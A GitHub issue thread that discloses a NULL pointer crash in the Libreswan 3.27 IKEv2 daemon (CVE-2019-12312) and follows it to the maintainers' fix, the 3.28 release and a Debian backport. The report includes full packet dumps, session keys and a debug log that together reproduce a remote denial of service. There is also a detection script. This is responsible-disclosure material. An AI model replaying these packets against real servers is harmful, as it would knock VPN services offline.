NULL pointer dereference and pluto daemon restart in Libreswan 3.27 #246

Closed
GuoJiaXing-Lab124 opened this issue May 12, 2019 · 9 comments

@GuoJiaXing-Lab124
commented May 12, 2019

Hello, I triggered a vulnerability while testing the Libreswan 3.27 IKEv2 server.

The pluto IKE daemon will restart (due to a NULL pointer dereference when built with NSS) when two IKEv2 packets, init_IKE and delete_IKE, are sent in 3des_cbc mode to the Libreswan server.

The detailed interaction is as follows:

First, send the first init_IKE message to the server.

The server replies to the client with the init_IKE message.

Then send a delete_IKE message (encrypted) to the server.

The server tries to respond with INVALID_IKE_SPI to the client, but an exception occurs while it prepares to encrypt the message.

#### detailed packets
# The first packet(I: init_IKE)
###[ IP ]### 
     version   = 4
     ihl       = 5
     tos       = 0x0
     len       = 416
     id        = 1
     flags     = 
     frag      = 0
     ttl       = 64
     proto     = udp
     chksum    = 0xa778
     src       = 192.168.40.1
     dst       = 192.168.40.130
     \options   \
###[ UDP ]### 
        sport     = isakmp
        dport     = isakmp
        len       = 396
        chksum    = 0x3708
###[ IKEv2 ]### 
           init_SPI  = '4\xba;\xf6\xd8\x8c\x17\xef'
           resp_SPI  = ''
           next_payload= SA
           version   = 0x20
           exch_type = IKE_SA_INIT
           flags     = Initiator
           id        = 0
           length    = 388
###[ IKEv2 SA ]### 
              next_payload= KE
              res       = 0
              length    = 44
              \prop      \
               |###[ IKEv2 Proposal ]### 
               |  next_payload= last
               |  res       = 0
               |  length    = 40
               |  proposal  = 1
               |  proto     = IKEv2
               |  SPIsize   = 0
               |  trans_nb  = 4
               |  SPI       = ''
               |  \trans     \
               |   |###[ IKE Transform ]### 
               |   |  next_payload= Transform
               |   |  res       = 0
               |   |  length    = 8
               |   |  transform_type= Encryption
               |   |  res2      = 0
               |   |  transform_id= 3DES
               |   |###[ IKE Transform ]### 
               |   |     next_payload= Transform
               |   |     res       = 0
               |   |     length    = 8
               |   |     transform_type= Integrity
               |   |     res2      = 0
               |   |     transform_id= HMAC-SHA1-96
               |   |###[ IKE Transform ]### 
               |   |        next_payload= Transform
               |   |        res       = 0
               |   |        length    = 8
               |   |        transform_type= PRF
               |   |        res2      = 0
               |   |        transform_id= PRF_HMAC_SHA1
               |   |###[ IKE Transform ]### 
               |   |           next_payload= last
               |   |           res       = 0
               |   |           length    = 8
               |   |           transform_type= GroupDesc
               |   |           res2      = 0
               |   |           transform_id= 1024MODPgr
###[ IKEv2 Key Exchange ]### 
                 next_payload= Nonce
                 res       = 0
                 length    = 136
                 group     = 1024MODPgr
                 res2      = 0
                 load      = '(\xe9\xaa\xaa\x91\xf1\x1d)\xd9\x1c\x9c\xeb\xcab\x90\xd8\x8fZ\x19\xad\x15\x80\xfe\x16\xde\x06j\x93\t\x92\xcay\x0f^}\x16\x11\xdc\xab\xd3\x0f\xf6ciA\xfe\t\x8del\xd4D\x04\x00\x87v\\Q\xa7\x83t\xc4u\x18\xe6\xb1\xdcV\xbb\x00u}?\x8dz\x90\xef\xe9gb\xf3uJr\x8ed\xae\xcf:\x85\xe5\xdf\xda\xdc1\xc3\x95K\x8e\x82\x84\x96\x0b\xea_N\xe5\x8bB\xdf\x9c\\\xa4\x1a\xbd\xf4B\x07\x1a\x0c\xfd)\xb9.4y\x1d\xa1'
###[ IKEv2 Nonce ]### 
                    next_payload= Notify
                    res       = 0
                    length    = 36
                    load      = '\x9al/\xbe\x01\x1f\xdc\xdc\x8b\xa4O\xd7k\xdf\x96^9\xcbmx\xcf\xe8\xc4\xa4$x\x8a\r\xbb%\xa6\xb2'
###[ IKEv2 Notify ]### 
                       next_payload= Notify
                       res       = 0
                       length    = 28
                       proto     = Reserved
                       SPIsize   = 0
                       type      = NAT_DETECTION_SOURCE_IP
                       SPI       = ''
                       load      = '\x13\xfa\x01\xe7<\xe4\x93T\xb6\xec\x88\x1d\xeaS\x13O\xad2\x86 '
###[ IKEv2 Notify ]### 
                          next_payload= VendorID
                          res       = 0
                          length    = 28
                          proto     = Reserved
                          SPIsize   = 0
                          type      = NAT_DETECTION_DESTINATION_IP
                          SPI       = ''
                          load      = '\xde\xb7\xf8\x91\xddX(\xe6\x89\xc3\xc1l\xae\x9a\x07\xb8o\xb4\x13\xc3'
###[ IKEv2 Vendor ID ]### 
                             next_payload= VendorID
                             res       = 0
                             length    = 24
                             vendorID  = '\x1e+Qi\x05\x99\x1c}|\x96\xfc\xbf\xb5\x87\xe4a\x00\x00\x00\t'
###[ IKEv2 Vendor ID ]### 
                                next_payload= VendorID
                                res       = 0
                                length    = 20
                                vendorID  = '\xfb\x1d\xe3\xcd\xf3A\xb7\xea\x16\xb7\xe5\xbe\x08U\xf1 '
###[ IKEv2 Vendor ID ]### 
                                   next_payload= VendorID
                                   res       = 0
                                   length    = 20
                                   vendorID  = '&$M8\xed\xdba\xb3\x17*6\xe3\xd0\xcf\xb8\x19'
###[ IKEv2 Vendor ID ]### 
                                      next_payload= None
                                      res       = 0
                                      length    = 24
                                      vendorID  = '\x01R\x8b\xbb\xc0\x06\x96\x12\x18I\xab\x9a\x1c[*Q\x00\x00\x00\x02'
               
# The second packet(R: init_IKE)
###[ IP ]### 
     version   = 4
     ihl       = 5
     tos       = 0x0
     len       = 361
     id        = 31815
     flags     = DF
     frag      = 0
     ttl       = 64
     proto     = udp
     chksum    = 0xeb68
     src       = 192.168.40.130
     dst       = 192.168.40.1
     \options   \
###[ UDP ]### 
        sport     = isakmp
        dport     = isakmp
        len       = 341
        chksum    = 0xd236
###[ IKEv2 ]### 
           init_SPI  = '4\xba;\xf6\xd8\x8c\x17\xef'
           resp_SPI  = '\xc6\xe1\x11i\x1d^\x18D'
           next_payload= SA
           version   = 0x20
           exch_type = IKE_SA_INIT
           flags     = Response
           id        = 0
           length    = 333
###[ IKEv2 SA ]### 
              next_payload= KE
              res       = 0
              length    = 44
              \prop      \
               |###[ IKEv2 Proposal ]### 
               |  next_payload= last
               |  res       = 0
               |  length    = 40
               |  proposal  = 1
               |  proto     = IKEv2
               |  SPIsize   = 0
               |  trans_nb  = 4
               |  SPI       = ''
               |  \trans     \
               |   |###[ IKE Transform ]### 
               |   |  next_payload= Transform
               |   |  res       = 0
               |   |  length    = 8
               |   |  transform_type= Encryption
               |   |  res2      = 0
               |   |  transform_id= 3DES
               |   |###[ IKE Transform ]### 
               |   |     next_payload= Transform
               |   |     res       = 0
               |   |     length    = 8
               |   |     transform_type= PRF
               |   |     res2      = 0
               |   |     transform_id= PRF_HMAC_SHA1
               |   |###[ IKE Transform ]### 
               |   |        next_payload= Transform
               |   |        res       = 0
               |   |        length    = 8
               |   |        transform_type= Integrity
               |   |        res2      = 0
               |   |        transform_id= HMAC-SHA1-96
               |   |###[ IKE Transform ]### 
               |   |           next_payload= last
               |   |           res       = 0
               |   |           length    = 8
               |   |           transform_type= GroupDesc
               |   |           res2      = 0
               |   |           transform_id= 1024MODPgr
###[ IKEv2 Key Exchange ]### 
                 next_payload= Nonce
                 res       = 0
                 length    = 136
                 group     = 1024MODPgr
                 res2      = 0
                 load      = '\x7f\x9b\x1aHlx\xdd\x86\xaa\xcf\x8e\xcd\x14\x9dU\x1e\x9c\x96\x99\xe6\x16\xc6\xce\xc8.&\xe5\x0e\x16\x8cfr\xfc\x8c\xc60\x83k\x8dF\x1a\xd5s\x8a^\xa5\x85\xcd\x86-\xde\x97\x98\xedc\x17\xb8\xf84!\x15\xf0\x11(D?\xd9\xa3\xc2\x80\xd6\xd6\x92R\xe2\t\xcb\xa2D{\x13g\xb7\x99\xa4\xa7\xd4\x8b\x0c\xf7\xb8\xbd\xa0]\x87\xd0\xa1\xa6~Nf\x9d\x98\x9f\x89\x94\xe5V\xed%\x0f&\x8cT\xe6\xa0\x05Uuyk\xe1w\xd82]A\xfa'
###[ IKEv2 Nonce ]### 
                    next_payload= Notify
                    res       = 0
                    length    = 36
                    load      = '\xe9\xc3c\x8a\xa7\xa9_\x8d\xf3\x15\xbc7\xaa\xd8\x8b\xd4\x93\x16\xb7\x10\xe0w\xc0\x10IY\xc1s\xf2<+k'
###[ IKEv2 Notify ]### 
                       next_payload= Notify
                       res       = 0
                       length    = 8
                       proto     = Reserved
                       SPIsize   = 0
                       type      = IKEV2_FRAGMENTATION_SUPPORTED
                       SPI       = ''
                       load      = ''
###[ IKEv2 Notify ]### 
                          next_payload= Notify
                          res       = 0
                          length    = 28
                          proto     = Reserved
                          SPIsize   = 0
                          type      = NAT_DETECTION_SOURCE_IP
                          SPI       = ''
                          load      = 's\x9a\xd1\xecQ\xc4L\xdfy^\xa5\xb9\x9b\xa4\r\xde\x0c\x13;\xdc'
###[ IKEv2 Notify ]### 
                             next_payload= CERTREQ
                             res       = 0
                             length    = 28
                             proto     = Reserved
                             SPIsize   = 0
                             type      = NAT_DETECTION_DESTINATION_IP
                             SPI       = ''
                             load      = "\x91\n%J\x85\xb0\xec\xads\xf42\x8b1\x98\x7f\xff'\xcb\xa6\xfe"
###[ IKEv2 Payload ]### 
                                next_payload= None
                                flags     = 
                                length    = 25
                                load      = '\x04\xa40\xb5\xee\xedr\x07\xa7\xbf\xe1L<]\x95\x19\xde\xeeys\xd9'
                
# The third packet(I: delete_IKE)
###[ IP ]### 
     version   = 4
     ihl       = 5
     tos       = 0x0
     len       = 100
     id        = 1
     flags     = 
     frag      = 0
     ttl       = 64
     proto     = udp
     chksum    = 0xa8b4
     src       = 192.168.40.1
     dst       = 192.168.40.130
     \options   \
###[ UDP ]### 
        sport     = 4500
        dport     = 4500
        len       = 80
        chksum    = 0xafe4
        data      = 0x00000000
###[ IKEv2 ]### 
  init_SPI  = '4\xba;\xf6\xd8\x8c\x17\xef'
  resp_SPI  = '\xc6\xe1\x11i\x1d^\x18D'
  next_payload= Encrypted
  version   = 0x20
  exch_type = INFORMATIONAL
  flags     = Initiator
  id        = 1
  length    = 68
###[ IKEv2 Encrypted and Authenticated ]### 
     next_payload= Delete
     res       = 0
     length    = 40
     load      = '=!\x87\x9c@\x0eX\xe5\xa1\xdf\xc6\xc9\xa2&\xf8\xf5\xc7\x0fSu\xd7\xa0\xdf\xc4nZ\x1a\x99U\x02Y_\xad\xc5UA'

        
# *************** # 
# Decrypted message        
###[ IKEv2 Delete ]### 
  next_payload= None
  res       = 0
  length    = 8
  vendorID  = '\x01\x00\x00\x00'
# *************** # 
        
# relevant parameters
spi_i
0x34\0xba\0x3b\0xf6\0xd8\0x8c\0x17\0xef
spi_r
0xc6\0xe1\0x11\0x69\0x1d\0x5e\0x18\0x44
sk_ai
0xa7\0xcb\0x4f\0x50\0xe9\0xb5\0x61\0x8f\0x04\0xc4\0xaa\0x0f\0x58\0x93\0x98\0xd3\0xfd\0xb6\0xdb\0xdb
sk_ar
0x89\0x2c\0xd0\0x3a\0x4e\0xb1\0xeb\0x19\0xf7\0x04\0xc1\0xc1\0x6f\0x64\0x08\0x5d\0x4b\0xef\0x8d\0x34
sk_ei
0xe9\0x4a\0x94\0x4d\0x2e\0xfb\0x8b\0x8e\0x86\0xb9\0xd6\0x18\0xfb\0xcd\0x53\0xdd\0xd8\0x35\0x60\0xba\0xc8\0xbb\0x71\0x46
sk_er
0x7a\0x4d\0x3d\0xb3\0x4d\0x72\0x7e\0x25\0xa4\0xc5\0x4a\0xb1\0x93\0x9d\0x9f\0x51\0x17\0x44\0x86\0x3e\0x51\0xe0\0x39\0x22

       
Relevant log
May  7 16:32:32.868480: | state #1 requesting EVENT_CRYPTO_TIMEOUT to be deleted
May  7 16:32:32.868496: | free_event_entry: release EVENT_CRYPTO_TIMEOUT-pe@0x55f4dc4630f8
May  7 16:32:32.868501: | event_schedule: new EVENT_v2_RESPONDER_TIMEOUT-pe@0x55f4dc4630f8
May  7 16:32:32.868506: | inserting event EVENT_v2_RESPONDER_TIMEOUT, timeout in 200.000 seconds for #1
May  7 16:32:32.868515: | processing: stop state #1 connection "ikev2-cp"[1] 192.168.40.1 192.168.40.1:500 (in schedule_event_now_cb() at server.c:561)
May  7 16:32:32.868519: | serialno table: hash serialno #0 to head 0x55f4db2fb4e0
May  7 16:32:32.868522: | serialno table: hash serialno #0 to head 0x55f4db2fb4e0
May  7 16:32:32.883707: | *received 68 bytes from 192.168.40.1:4500 on ens33 (port=4500)
May  7 16:32:32.883740: |   34 ba 3b f6  d8 8c 17 ef  c6 e1 11 69  1d 5e 18 44
May  7 16:32:32.883743: |   2e 20 25 08  00 00 00 01  00 00 00 44  2a 00 00 28
May  7 16:32:32.883745: |   3d 21 87 9c  40 0e 58 e5  a1 df c6 c9  a2 26 f8 f5
May  7 16:32:32.883766: |   c7 0f 53 75  d7 a0 df c4  6e 5a 1a 99  55 02 59 5f
May  7 16:32:32.883769: |   ad c5 55 41
May  7 16:32:32.883773: | processing: start from 192.168.40.1:4500 (in process_md() at demux.c:391)
May  7 16:32:32.883778: | **parse ISAKMP Message:
May  7 16:32:32.883780: |    initiator cookie:
May  7 16:32:32.883782: |   34 ba 3b f6  d8 8c 17 ef
May  7 16:32:32.883785: |    responder cookie:
May  7 16:32:32.883786: |   c6 e1 11 69  1d 5e 18 44
May  7 16:32:32.883789: |    next payload type: ISAKMP_NEXT_v2SK (0x2e)
May  7 16:32:32.883792: |    ISAKMP version: IKEv2 version 2.0 (rfc4306/rfc5996) (0x20)
May  7 16:32:32.883794: |    exchange type: ISAKMP_v2_INFORMATIONAL (0x25)
May  7 16:32:32.883796: |    flags: ISAKMP_FLAG_v2_IKE_INIT (0x8)
May  7 16:32:32.883799: |    message ID:  00 00 00 01
May  7 16:32:32.883801: |    length: 68 (0x44)
May  7 16:32:32.883804: |  processing version=2.0 packet with exchange type=ISAKMP_v2_INFORMATIONAL (37)
May  7 16:32:32.883806: | I am receiving an IKEv2 Request ISAKMP_v2_INFORMATIONAL
May  7 16:32:32.883808: | I am the IKE SA Original Responder
May  7 16:32:32.883814: | cookies table: hash icookie 34 ba 3b f6  d8 8c 17 ef rcookie c6 e1 11 69  1d 5e 18 44 to 3873113480610546027 slot 0x55f4db2f6b40
May  7 16:32:32.883817: | parent v2 peer and cookies match on #1
May  7 16:32:32.883820: | v2 state object #1 found, in STATE_PARENT_R1
May  7 16:32:32.883825: | processing: start state #1 connection "ikev2-cp"[1] 192.168.40.1 192.168.40.1:500 (in processed_retransmit() at ikev2.c:1182)
May  7 16:32:32.883827: | found state #1
May  7 16:32:32.883831: | processing: [RE]START state #1 connection "ikev2-cp"[1] 192.168.40.1 192.168.40.1:500 (in ikev2_process_packet() at ikev2.c:1552)
May  7 16:32:32.883834: | processing: start connection "ikev2-cp"[1] 192.168.40.1 (BACKGROUND) (in ikev2_process_packet() at ikev2.c:1557)
May  7 16:32:32.883837: | #1 is idle
May  7 16:32:32.883839: | #1 idle
May  7 16:32:32.883841: | #1 in state PARENT_R1: received v2I1, sent v2R1
May  7 16:32:32.883844: | selected state microcode roof
May  7 16:32:32.883846: | no useful state microcode entry found
May  7 16:32:32.883850: "ikev2-cp"[1] 192.168.40.1 #1: responding to INFORMATIONAL message (ID 1) from 192.168.40.1:500 with encrypted notification INVALID_IKE_SPI
May  7 16:32:32.883853: | Opening output PBS encrypted notification
May  7 16:32:32.883856: | **emit ISAKMP Message:
May  7 16:32:32.883858: |    initiator cookie:
May  7 16:32:32.883860: |   34 ba 3b f6  d8 8c 17 ef
May  7 16:32:32.883862: |    responder cookie:
May  7 16:32:32.883864: |   c6 e1 11 69  1d 5e 18 44
May  7 16:32:32.883866: |    next payload type: ISAKMP_NEXT_NONE (0x0)
May  7 16:32:32.883869: |    ISAKMP version: IKEv2 version 2.0 (rfc4306/rfc5996) (0x20)
May  7 16:32:32.883871: |    exchange type: ISAKMP_v2_INFORMATIONAL (0x25)
May  7 16:32:32.883873: |    flags: ISAKMP_FLAG_v2_MSG_RESPONSE (0x20)
May  7 16:32:32.883875: |    message ID:  00 00 00 01
May  7 16:32:32.883878: | next payload type: saving message location 'ISAKMP Message'.'next payload type'
May  7 16:32:32.883881: | next payload type: setting 'ISAKMP Message'.'next payload type' to IKEv2 Encryption Payload (46:ISAKMP_NEXT_v2SK)
May  7 16:32:32.883884: | ***emit IKEv2 Encryption Payload:
May  7 16:32:32.883886: |    next payload type: ISAKMP_NEXT_v2NONE (0x0)
May  7 16:32:32.883888: |    flags: none (0x0)
May  7 16:32:32.883890: | next payload type: saving message location 'IKEv2 Encryption Payload'.'next payload type'
May  7 16:32:32.883901: | emitting 8 raw bytes of IV into IKEv2 Encryption Payload
May  7 16:32:32.883904: | IV  d1 f5 3d d9  f2 04 95 d2
May  7 16:32:32.883906: | Adding a v2N Payload
May  7 16:32:32.883909: | next payload type: setting 'IKEv2 Encryption Payload'.'next payload type' to IKEv2 Notify Payload (41:ISAKMP_NEXT_v2N)
May  7 16:32:32.883911: | ****emit IKEv2 Notify Payload:
May  7 16:32:32.883913: |    next payload type: ISAKMP_NEXT_v2NONE (0x0)
May  7 16:32:32.883915: |    flags: none (0x0)
May  7 16:32:32.883918: |    Protocol ID: PROTO_v2_RESERVED (0x0)
May  7 16:32:32.883926: |    SPI size: 0 (0x0)
May  7 16:32:32.883929: |    Notify Message Type: v2N_INVALID_IKE_SPI (0x4)
May  7 16:32:32.883931: | next payload type: saving payload location 'IKEv2 Notify Payload'.'next payload type'
May  7 16:32:32.883944: | emitting length of IKEv2 Notify Payload: 8
May  7 16:32:32.883947: | adding 8 bytes of padding (including 1 byte padding-length)
May  7 16:32:32.883949: | emitting 8 raw bytes of padding and length into IKEv2 Encryption Payload
May  7 16:32:32.883952: | padding and length  00 01 02 03  04 05 06 07
May  7 16:32:32.883955: | emitting 12 zero bytes of length of truncated HMAC/KEY into IKEv2 Encryption Payload
May  7 16:32:32.883966: | emitting length of IKEv2 Encryption Payload: 40
May  7 16:32:32.883969: | emitting length of ISAKMP Message: 68
May  7 16:32:32.883972: | construct_enc_iv: encryption IV/starting-variable: salt-size=0 wire-IV-size=8 block-size 8
May  7 16:32:32.883974: | construct_enc_iv: encryption IV/starting-variable: computed counter-size=0
May  7 16:32:32.883976: | encryption IV/starting-variable
May  7 16:32:32.883978: |   d1 f5 3d d9  f2 04 95 d2
May  7 16:32:32.883980: | data before encryption:
May  7 16:32:32.883982: |   00 00 00 08  00 00 00 04  00 01 02 03  04 05 06 07
May  7 16:32:32.883985: | NSS ike_alg_nss_cbc: 3des_cbc - enter
May  7 16:32:32.883988: "ikev2-cp"[1] 192.168.40.1 #1: ABORT: ASSERTION FAILED: 3des_cbc - NSS derived enc key in NULL (in ike_alg_nss_cbc() at ike_alg_encrypt_nss_cbc_ops.c:41)
My ipsec.conf
version 2.0

config setup
  virtual-private=%v4:10.0.0.0/8,%v4:192.168.0.0/16,%v4:172.16.0.0/12,%v4:!192.168.42.0/24,%v4:!192.168.43.0/24
  protostack=netkey
  interfaces=%defaultroute
  uniqueids=no
  plutodebug="all crypt"
  plutostderrlog=/var/log/libreswan.log

conn ikev2-cp
  left=%defaultroute
  leftcert=192.168.40.130
  leftid=@192.168.40.130
  leftsendcert=always
  leftsubnet=0.0.0.0/0
  leftrsasigkey=%cert
  right=%any
  rightid=%fromcert
  # rightaddresspool=192.168.43.10-192.168.43.250
  rightaddresspool=10.31.2.0-10.31.3.254
  rightca=%same
  rightrsasigkey=%cert
  narrowing=yes
  dpddelay=30
  dpdtimeout=120
  dpdaction=clear
  auto=add
  ikev2=insist
  rekey=yes
  pfs=no
  ike-frag=yes
  ike=3des-sha1;modp1024,aes256-sha2,aes128-sha2,aes256-sha1,aes128-sha1,aes256-sha2;modp1024,aes128-sha1;modp1024
  phase2alg=3des-sha1;modp1024,aes_gcm-null,aes128-sha1,aes256-sha1,aes128-sha2,aes256-sha2
  modecfgdns="8.8.8.8 8.8.4.4"
  encapsulation=yes
  mobike=no

conn shared
  left=%defaultroute
  leftid=218.28.144.36
  right=%any
  encapsulation=yes
  authby=secret
  pfs=no
  rekey=no
  keyingtries=5
  dpddelay=30
  dpdtimeout=120
  dpdaction=clear
  ike=aes256-sha2,aes128-sha2,aes256-sha1,aes128-sha1,aes256-sha2;modp1024,aes128-sha1;modp1024
  phase2alg=aes_gcm-null,aes128-sha1,aes256-sha1,aes256-sha2_512,aes128-sha2,aes256-sha2
  sha2-truncbug=yes


conn l2tp-psk
  auto=add
  leftprotoport=17/1701
  rightprotoport=17/%any
  type=transport
  phase2=esp
  also=shared


conn xauth-psk
  auto=add
  leftsubnet=0.0.0.0/0
  rightaddresspool=192.168.43.10-192.168.43.250
  modecfgdns="8.8.8.8 8.8.4.4"
  leftxauthserver=yes
  rightxauthclient=yes
  leftmodecfgserver=yes
  rightmodecfgclient=yes
  modecfgpull=yes
  xauthby=file
  ike-frag=yes
  ikev2=never
  cisco-unity=yes
  also=shared
  ike=3des-sha1;modp1024,aes256-sha2,aes128-sha2,aes256-sha1,aes128-sha1,aes256-sha2;modp1024,aes128-sha1;modp1024
  phase2alg=aes_gcm-null,aes128-sha1,aes256-sha1,aes128-sha2,aes256-sha2

Looking forward to your reply, thank you.
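A detection sketch for the failure recorded in the log above, as an added example that is not part of the original report or of libreswan: it scans pluto debug output for an encrypted notification sent while the state is still PARENT_R1 and marks whether an ABORT followed. The regexes, `scan()`, `Finding` and the `PRE_KEY_STATES` set are assumptions modelled on the lines in this log; the sample input is excerpted from it.

```python
import re
from dataclasses import dataclass

# Assumption: PARENT_R1 (IKE_SA_INIT answered, no IKE_AUTH yet) is the only
# pre-keying state tracked, because it is the state shown in this issue's log.
PRE_KEY_STATES = {"PARENT_R1"}

LINE = re.compile(r"^(?P<ts>\w{3}\s+\d+ [\d:.]+): (?P<msg>.*)$")
STATE = re.compile(r"^\| #(?P<serial>\d+) in state (?P<state>\w+):")
ENC_NOTIFY = re.compile(
    r'^"(?P<conn>[^"]+)"\[\d+\] (?P<peer>\S+) #(?P<serial>\d+): responding to '
    r"(?P<exch>\w+) message \(ID (?P<msgid>\d+)\) from \S+ "
    r"with encrypted notification (?P<notify>\w+)"
)
ABORT = re.compile(r"#(?P<serial>\d+): ABORT: ASSERTION FAILED: (?P<why>.*)$")

# Sample input: lines excerpted from the log posted in this issue.
SAMPLE_LOG = """\
May  7 16:32:32.883820: | v2 state object #1 found, in STATE_PARENT_R1
May  7 16:32:32.883841: | #1 in state PARENT_R1: received v2I1, sent v2R1
May  7 16:32:32.883846: | no useful state microcode entry found
May  7 16:32:32.883850: "ikev2-cp"[1] 192.168.40.1 #1: responding to INFORMATIONAL message (ID 1) from 192.168.40.1:500 with encrypted notification INVALID_IKE_SPI
May  7 16:32:32.883985: | NSS ike_alg_nss_cbc: 3des_cbc - enter
May  7 16:32:32.883988: "ikev2-cp"[1] 192.168.40.1 #1: ABORT: ASSERTION FAILED: 3des_cbc - NSS derived enc key in NULL (in ike_alg_nss_cbc() at ike_alg_encrypt_nss_cbc_ops.c:41)
"""


@dataclass
class Finding:
    timestamp: str
    conn: str
    peer: str
    serial: int
    state: str
    notify: str
    aborted: bool = False
    abort_reason: str = ""


def scan(log_text):
    """Return a Finding for every encrypted notify sent from a pre-keying state."""
    states = {}    # state serial -> last state name logged for it
    pending = {}   # state serial -> Finding that a later ABORT would confirm
    findings = []
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue
        ts, msg = m["ts"], m["msg"]
        if (s := STATE.match(msg)):
            states[int(s["serial"])] = s["state"]
        elif (e := ENC_NOTIFY.match(msg)):
            serial = int(e["serial"])
            state = states.get(serial, "unknown")
            if state in PRE_KEY_STATES:
                f = Finding(ts, e["conn"], e["peer"], serial, state, e["notify"])
                findings.append(f)
                pending[serial] = f
        elif (a := ABORT.search(msg)):
            f = pending.pop(int(a["serial"]), None)
            if f is not None:
                f.aborted = True
                f.abort_reason = a["why"]
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
```

The state lines it relies on are debug output, so it only works on logs collected with `plutodebug` enabled, as in the configuration above.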

libreswan pushed a commit that referenced this issue May 15, 2019

IKEv2: Do not attempt to encrypt a reply without established IKE SA
This is #246

Signed-off-by: D. Hugh Redelmeier <hugh@mimosa.com>
@letoams

Collaborator

commented May 15, 2019

Hi, we pushed a fix for this in commit 7142d2c.

Would you be able to test this for us?

@letoams

Collaborator

commented May 17, 2019

note an updated fix was pushed, including a test case to reproduce this. will be in 3.28

libreswan pushed a commit that referenced this issue May 17, 2019

@letoams

Collaborator

commented May 27, 2019

fixed and released in 3.28. Thanks for the report!

@letoams letoams closed this May 27, 2019

@dkg

Contributor

commented Jun 3, 2019

btw, this seems to be CVE-2019-12312

@letoams

Collaborator

commented Jun 3, 2019

@dkg

Contributor

commented Jun 3, 2019

> note an updated fix was pushed, including a test case to reproduce this. will be in 3.28

Which of the fixes are needed beyond 7142d2c? I've backported 7142d2c to 3.27 (see this patch), but I am concerned that there is some other subtle fix that I've missed.

@letoams

Collaborator

commented Jun 3, 2019

A patch along with the libreswan response to the CVE submitted will be published at https://libreswan.org/security/CVE-2019-12312/ shortly

@dkg

Contributor

commented Jun 3, 2019

I've uploaded 3.27-5 to Debian with this patch

@letoams

Collaborator

commented Jun 4, 2019
